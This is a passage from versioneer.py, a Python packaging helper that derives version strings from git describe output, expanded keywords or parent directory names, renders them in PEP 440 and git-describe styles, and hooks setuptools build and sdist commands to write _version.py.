if verbose:
print("unable to run %%s" %% dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %%s" %% (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %%s (error)" %% dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
"""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%%s', but '%%s' doesn't start with "
"prefix '%%s'" %% (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %%d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%%s', no digits" %% ",".join(refs-tags))
if verbose:
print("likely tags: %%s" %% ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %%s" %% r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %%s" %% root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%%s*" %% tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%%s'"
%% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%%s' doesn't start with prefix '%%s'"
print(fmt %% (full_tag, tag_prefix))
pieces["error"] = ("tag '%%s' doesn't start with prefix '%%s'"
%% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%%d.g%%s" %% (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%%d.g%%s" %% (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%%d" %% pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%%d" %% pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%%s" %% pieces["short"]
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%%s" %% pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%%s'" %% style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree"}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version"}
'''
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs-tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %s" % root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
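# Illustrative sketch (hypothetical values): with tag_prefix = "v", a
# describe_out of "v1.2-3-gabc1234-dirty" is parsed by the function above into
#     pieces = {"closest-tag": "1.2", "distance": 3, "short": "abc1234",
#               "dirty": True, "long": <full SHA from 'git rev-parse HEAD'>,
#               "error": None}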
def do_vcs_install(manifest_in, versionfile_source, ipy):
"""Git-specific installation logic for Versioneer.
For Git, this means creating/changing .gitattributes to mark _version.py
for export-time keyword substitution.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
files = [manifest_in, versionfile_source]
if ipy:
files.append(ipy)
try:
me = __file__
if me.endswith(".pyc") or me.endswith(".pyo"):
me = os.path.splitext(me)[0] + ".py"
versioneer_file = os.path.relpath(me)
except NameError:
versioneer_file = "versioneer.py"
files.append(versioneer_file)
present = False
try:
f = open(".gitattributes", "r")
for line in f.readlines():
if line.strip().startswith(versionfile_source):
if "export-subst" in line.strip().split()[1:]:
present = True
f.close()
except EnvironmentError:
pass
if not present:
f = open(".gitattributes", "a+")
f.write("%s export-subst\n" % versionfile_source)
f.close()
files.append(".gitattributes")
run_command(GITS, ["add", "--"] + files)
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
"""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%s', but '%s' doesn't start with "
"prefix '%s'" % (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
SHORT_VERSION_PY = """
# This file was generated by 'versioneer.py' (0.15+dev) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
import sys
version_json = '''
%s
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
"""
def versions_from_file(filename):
"""Try to determine the version from _version.py if present."""
try:
with open(filename) as f:
contents = f.read()
except EnvironmentError:
raise NotThisMethod("unable to read _version.py")
mo = re.search(r"version_json = '''\n(.*)''' # END VERSION_JSON",
contents, re.M | re.S)
if not mo:
raise NotThisMethod("no version_json in _version.py")
return json.loads(mo.group(1))
def write_to_version_file(filename, versions):
"""Write the given version number to the given _version.py file."""
os.unlink(filename)
contents = json.dumps(versions, sort_keys=True,
indent=1, separators=(",", ": "))
with open(filename, "w") as f:
f.write(SHORT_VERSION_PY % contents)
print("set %s to '%s'" % (filename, versions["version"]))
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
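# Illustrative sketch (hypothetical values): for
#     pieces = {"closest-tag": "1.2", "distance": 3, "short": "abc1234",
#               "dirty": True}
# render_pep440(pieces) yields "1.2+3.gabc1234.dirty"; with distance 0 and a
# clean tree it yields just "1.2".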
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
class VersioneerBadRootError(Exception):
"""The project root directory is unknown or missing key files."""
def get_versions(verbose=False):
"""Get the project version from whatever source is available.
Returns dict with two keys: 'version' and 'full'.
"""
if "versioneer" in sys.modules:
# see the discussion in cmdclass.py:get_cmdclass()
del sys.modules["versioneer"]
root = get_root()
cfg = get_config_from_root(root)
assert cfg.VCS is not None, "please set [versioneer]VCS= in setup.cfg"
handlers = HANDLERS.get(cfg.VCS)
assert handlers, "unrecognized VCS '%s'" % cfg.VCS
verbose = verbose or cfg.verbose
assert cfg.versionfile_source is not None, \
"please set versioneer.versionfile_source"
assert cfg.tag_prefix is not None, "please set versioneer.tag_prefix"
versionfile_abs = os.path.join(root, cfg.versionfile_source)
# extract version from first of: _version.py, VCS command (e.g. 'git
# describe'), parentdir. This is meant to work for developers using a
# source checkout, for users of a tarball created by 'setup.py sdist',
# and for users of a tarball/zipball created by 'git archive' or github's
# download-from-tag feature or the equivalent in other VCSes.
get_keywords_f = handlers.get("get_keywords")
from_keywords_f = handlers.get("keywords")
if get_keywords_f and from_keywords_f:
try:
keywords = get_keywords_f(versionfile_abs)
ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
if verbose:
print("got version from expanded keyword %s" % ver)
return ver
except NotThisMethod:
pass
try:
ver = versions_from_file(versionfile_abs)
if verbose:
print("got version from file %s %s" % (versionfile_abs, ver))
return ver
except NotThisMethod:
pass
from_vcs_f = handlers.get("pieces_from_vcs")
if from_vcs_f:
try:
pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
ver = render(pieces, cfg.style)
if verbose:
print("got version from VCS %s" % ver)
return ver
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
if verbose:
print("got version from parentdir %s" % ver)
return ver
except NotThisMethod:
pass
if verbose:
print("unable to compute version")
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None, "error": "unable to compute version"}
def get_version():
"""Get the short version string for this project."""
return get_versions()["version"]
def get_cmdclass():
"""Get the custom setuptools/distutils subclasses used by Versioneer."""
if "versioneer" in sys.modules:
del sys.modules["versioneer"]
# this fixes the "python setup.py develop" case (also 'install' and
# 'easy_install .'), in which subdependencies of the main project are
# built (using setup.py bdist_egg) in the same python process. Assume
# a main project A and a dependency B, which use different versions
# of Versioneer. A's setup.py imports A's Versioneer, leaving it in
# sys.modules by the time B's setup.py is executed, causing B to run
# with the wrong versioneer. Setuptools wraps the sub-dep builds in a
# sandbox that restores sys.modules to its pre-build state, so the
# parent is protected against the child's "import versioneer". By
# removing ourselves from sys.modules here, before the child build
# happens, we protect the child from the parent's versioneer too.
# Also see https://github.com/warner/python-versioneer/issues/52
cmds = {}
# we add "version" to both distutils and setuptools
from distutils.core import Command
class cmd_version(Command):
description = "report generated version string"
user_options = []
boolean_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
vers = get_versions(verbose=True)
print("Version: %s" % vers["version"])
print(" full-revisionid: %s" % vers.get("full-revisionid"))
print(" dirty: %s" % vers.get("dirty"))
if vers["error"]:
print(" error: %s" % vers["error"])
cmds["version"] = cmd_version
# we override "build_py" in both distutils and setuptools
#
# most invocation pathways end up running build_py:
# distutils/build -> build_py
# distutils/install -> distutils/build ->..
# setuptools/bdist_wheel -> distutils/install ->..
# setuptools/bdist_egg -> distutils/install_lib -> build_py
# setuptools/install -> bdist_egg ->..
# setuptools/develop -> ?
# we override different "build_py" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.build_py import build_py as _build_py
else:
from distutils.command.build_py import build_py as _build_py
class cmd_build_py(_build_py):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
_build_py.run(self)
# now locate _version.py in the new build/ directory and replace
# it with an updated value
if cfg.versionfile_build:
target_versionfile = os.path.join(self.build_lib,
cfg.versionfile_build)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
cmds["build_py"] = cmd_build_py
if "cx_Freeze" in sys.modules: # cx_freeze enabled?
from cx_Freeze.dist import build_exe as _build_exe
class cmd_build_exe(_build_exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_build_exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
cmds["build_exe"] = cmd_build_exe
del cmds["build_py"]
# we override different "sdist" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.sdist import sdist as _sdist
else:
from distutils.command.sdist import sdist as _sdist
class cmd_sdist(_sdist):
def run(self):
versions = get_versions()
self._versioneer_generated_versions = versions
# unless we update this, the command will keep using the old
# version
self.distribution.metadata.version = versions["version"]
return _sdist.run(self)
def make_release_tree(self, base_dir, files):
root = get_root()
cfg = get_config_from_root(root)
_sdist.make_release_tree(self, base_dir, files)
# now locate _version.py in the new base_dir directory
# (remembering that it may be a hardlink) and replace it with an
# updated value
target_versionfile = os.path.join(base_dir, cfg.versionfile_source)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile,
self._versioneer_generated_versions)
cmds["sdist"] = cmd_sdist
return cmds
CONFIG_ERROR = """
setup.cfg is missing the necessary Versioneer configuration. You need
a section like:
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
You will also need to edit your setup.py to use the results:
import versioneer
setup(version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(), ...)
Please read the docstring in ./versioneer.py for configuration instructions,
edit setup.cfg, and re-run the installer or 'python versioneer.py setup'.
"""
SAMPLE_CONFIG = """
# See the docstring in versioneer.py for instructions. Note that you must
# re-run 'versioneer.py setup' after changing this section, and commit the
# resulting files.
[versioneer]
#VCS = git
#style = pep440
#versionfile_source =
#versionfile_build =
#tag_prefix =
#parentdir_prefix =
"""
INIT_PY_SNIPPET = """
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
"""
def do_setup():
"""Main VCS-independent setup function for installing Versioneer."""
root = get_root()
try:
cfg = get_config_from_root(root)
except (EnvironmentError, configparser.NoSectionError,
configparser.NoOptionError) as e:
if isinstance(e, (EnvironmentError, configparser.NoSectionError)):
print("Adding sample versioneer config to setup.cfg",
file=sys.stderr)
with open(os.path.join(root, "setup.cfg"), "a") as f:
f.write(SAMPLE_CONFIG)
print(CONFIG_ERROR, file=sys.stderr)
return 1
print(" creating %s" % cfg.versionfile_source)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG % {"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
ipy = os.path.join(os.path.dirname(cfg.versionfile_source),
"__init__.py")
if os.path.exists(ipy):
try:
with open(ipy, "r") as f:
old = f.read()
except EnvironmentError:
old = ""
if INIT_PY_SNIPPET not in old:
print(" appending to %s" % ipy)
with open(ipy, "a") as f:
f.write(INIT_PY_SNIPPET)
else:
print(" %s unmodified" % ipy)
else:
print(" %s doesn't exist, ok" % ipy)
ipy = None
# Make sure both the top-level "versioneer.py" and versionfile_source
# (PKG/_version.py, used by runtime code) are in MANIFEST.in, so
# they'll be copied into source distributions. Pip won't be able to
# install the package without this.
manifest_in = os.path.join(root, "MANIFEST.in")
simple_includes = set()
try:
with open(manifest_in, "r") as f:
for line in f:
if line.startswith("include "):
for include in line.split()[1:]:
simple_includes.add(include)
except EnvironmentError:
pass
# That doesn't cover everything MANIFEST.in can do
# (http://docs.python.org/2/distutils/sourcedist.html#commands), so
# it might give some false negatives. Appending redundant 'include'
# lines is safe, though.
if "versioneer.py" not in simple_includes:
print(" appending 'versioneer.py' to MANIFEST.in")
with open(manifest_in, "a") as f:
